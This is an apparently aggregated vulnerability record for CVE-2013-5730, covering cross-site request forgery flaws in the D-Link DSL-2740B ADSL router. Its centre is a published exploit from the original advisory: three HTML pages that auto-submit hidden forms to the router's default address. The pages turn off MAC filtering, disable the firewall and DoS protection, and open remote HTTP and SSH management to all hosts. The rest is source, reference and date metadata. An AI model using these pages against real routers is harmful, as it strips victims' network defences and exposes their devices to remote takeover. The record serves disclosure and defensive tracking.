ID

VAR-E-201309-0047


CVE

cve_id:CVE-2013-5730

Trust: 2.4

sources: BID: 62356 // PACKETSTORM: 123200 // EXPLOIT-DB: 28239 // EDBNET: 50077

EDB ID

28239


TITLE

D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 28239

DESCRIPTION

D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities. CVE-2013-5730CVE-97278 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 28239

AFFECTED PRODUCTS

vendor:d linkmodel:dsl-2740bscope: - version: -

Trust: 2.1

vendor:d linkmodel:dsl-2740b eu 1.00scope: - version: -

Trust: 0.3

sources: BID: 62356 // PACKETSTORM: 123200 // EXPLOIT-DB: 28239 // EDBNET: 50077

EXPLOIT

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2740B (ADSL Router) CSRF Vulnerability
# Date : 09-08-2013
# Author : Ivano Binetti (http://ivanobinetti.com)
# Vendor site : http://www.d-link.com
# Version : DSL-2740B
# Tested on : Firmware Version: EU_1.00 (Other release could be affected)
# Original Advisory: http://www.webapp-security.com/2013/09/d-link-dsl-2740b-multiple-csrf-vulnerabilities
# CVE : CVE-2013-5730
+---------------------------------------------------------------------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerability Description
3)Exploit
3.1 Disable/Enable Wireless MAc Address Filter
3.2 Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")
3.3 Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -)
+---------------------------------------------------------------------------------------------------------------------------------+

1) Introduction

D-Link DSL-2740B is an ADSL Router using, also, a web management interface in order to set and change device parameters.

2) Vulnerability Description

The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters. The default ip adress of this adsl router, used for
management purpose, is 192.168.1.1.
In my Advisory I'll describe only how to carry out the following changes:
- Disable/Enable Wireless MAc Address Filter
- Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")
- Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -).
Many other changes can be performed.

3) Exploit
3.1 Disable/Enable Wireless MAc Address Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/wlmacflt.cmd?action=wlFltMode&wlFltMacMode=disabled">
</body>
</html>

3.2 Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/scdmz.cmd?&fwFlag=521472&dosenbl=0">
</body>
</html>

3.3 Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -)
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/scsrvcntr.cmd?action=save&rmtmode=1&rmtport=80&rmtaction=allowall&
ftp=0&http=2&icmp=2&snmp=2&tftp=0&ssh=1&telnet=0">
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+

Trust: 1.0

sources: EXPLOIT-DB: 28239

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 28239

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 28239

TYPE

Multiple Cross-Site Request Forgery Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 28239

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 123200

CREDITS

Ivano Binetti

Trust: 0.6

sources: EXPLOIT-DB: 28239

EXTERNAL IDS

db:NVDid:CVE-2013-5730

Trust: 2.4

db:EXPLOIT-DBid:28239

Trust: 1.6

db:EDBNETid:50077

Trust: 0.6

db:PACKETSTORMid:123200

Trust: 0.5

db:BIDid:62356

Trust: 0.3

sources: BID: 62356 // PACKETSTORM: 123200 // EXPLOIT-DB: 28239 // EDBNET: 50077

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-5730

Trust: 2.1

url:http://www.webapp-security.com/2013/09/d-link-dsl-2740b-multiple-csrf-vulnerabilities

Trust: 1.0

url:https://www.exploit-db.com/exploits/28239/

Trust: 0.6

url:http://www.dlink.com/us/en/home-solutions/connect/modems-and-gateways/dsl-2740b-adsl2plus-modem-with-wireless-n-300-router

Trust: 0.3

url:http://www.webapp-security.com/2013/09/d-link-dsl-2740b-multiple-csrf-vulnerabilities/

Trust: 0.3

sources: BID: 62356 // PACKETSTORM: 123200 // EXPLOIT-DB: 28239 // EDBNET: 50077

SOURCES

db:BIDid:62356
db:PACKETSTORMid:123200
db:EXPLOIT-DBid:28239
db:EDBNETid:50077

LAST UPDATE DATE

2022-07-27T09:21:57.546000+00:00


SOURCES UPDATE DATE

db:BIDid:62356date:2013-09-08T00:00:00

SOURCES RELEASE DATE

db:BIDid:62356date:2013-09-08T00:00:00
db:PACKETSTORMid:123200date:2013-09-12T18:03:33
db:EXPLOIT-DBid:28239date:2013-09-12T00:00:00
db:EDBNETid:50077date:2013-09-12T00:00:00